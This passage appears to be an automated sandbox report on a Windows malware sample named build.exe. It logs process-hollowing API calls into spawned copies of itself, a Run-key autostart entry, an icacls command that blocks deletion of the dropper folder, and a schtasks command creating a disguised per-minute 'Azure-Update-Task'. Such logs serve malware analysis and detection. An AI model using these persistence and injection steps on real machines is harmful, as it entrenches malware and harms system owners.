HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f\build.exe" --AutoStart

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 28, 2021, 1:45 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2084 process_handle: 0x00000080	1	1
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2420 process_handle: 0x00000080	1	1
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1868 process_handle: 0x00000080	1	1
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2236 process_handle: 0x00000080	1	1

Network activity contains more than one unique useragent (2 events)

process	build.exe				useragent	Microsoft Internet Explorer
process	build2.exe				useragent

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 called NtSetContextThread to modify thread in remote process 2084
Process injection	Process 1760 called NtSetContextThread to modify thread in remote process 2420
Process injection	Process 2620 called NtSetContextThread to modify thread in remote process 1868
Process injection	Process 2076 called NtSetContextThread to modify thread in remote process 2236
NtSetContextThread Sept. 28, 2021, 1:45 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2084	1	0	0
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2420	1	0	0
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4850477 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 1868	1	0	0
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2236	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 resumed a thread in remote process 2084
Process injection	Process 2084 resumed a thread in remote process 1760
Process injection	Process 1760 resumed a thread in remote process 2420
Process injection	Process 2620 resumed a thread in remote process 1868
Process injection	Process 2076 resumed a thread in remote process 2236
NtResumeThread Sept. 28, 2021, 1:45 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2084	1	0	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 1760	1	0	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2420	1	0	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 1868	1	0	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2236	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (34 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 28, 2021, 1:45 p.m.	thread_identifier: 2276 thread_handle: 0x0000007c process_identifier: 2084 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread Sept. 28, 2021, 1:45 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection Sept. 28, 2021, 1:45 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2084 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 1:45 p.m.	process_identifier: 2084 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory Sept. 28, 2021, 1:45 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2084 process_handle: 0x00000080	1	1
NtSetContextThread Sept. 28, 2021, 1:45 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2084	1	0
NtResumeThread Sept. 28, 2021, 1:45 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2084	1	0
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 1048 thread_handle: 0x00000314 process_identifier: 2324 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000304	1	1
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2196 thread_handle: 0x00000264 process_identifier: 1760 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000274	1	1
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 1760	1	0
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2952 thread_handle: 0x0000007c process_identifier: 2420 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection Sept. 28, 2021, 1:46 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2420 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2420 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2420 process_handle: 0x00000080	1	1
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2420	1	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2420	1	0
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2668 thread_handle: 0x00000298 process_identifier: 2620 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe" filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000290	1	1
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 1160 thread_handle: 0x000004bc process_identifier: 2076 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe" filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004d0	1	1
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2032 thread_handle: 0x0000007c process_identifier: 1868 current_directory: filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe" filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection Sept. 28, 2021, 1:46 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 1868 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 1868 region_size: 880640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1868 process_handle: 0x00000080	1	1
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4850477 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 1868	1	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 1868	1	0
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2252 thread_handle: 0x0000007c process_identifier: 2236 current_directory: filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe" filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection Sept. 28, 2021, 1:46 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2236 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2236 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory Sept. 28, 2021, 1:46 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2236 process_handle: 0x00000080	1	1
NtSetContextThread Sept. 28, 2021, 1:46 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2236	1	0
NtResumeThread Sept. 28, 2021, 1:46 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2236	1	0
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2764 thread_handle: 0x000000ac process_identifier: 3020 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

build.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All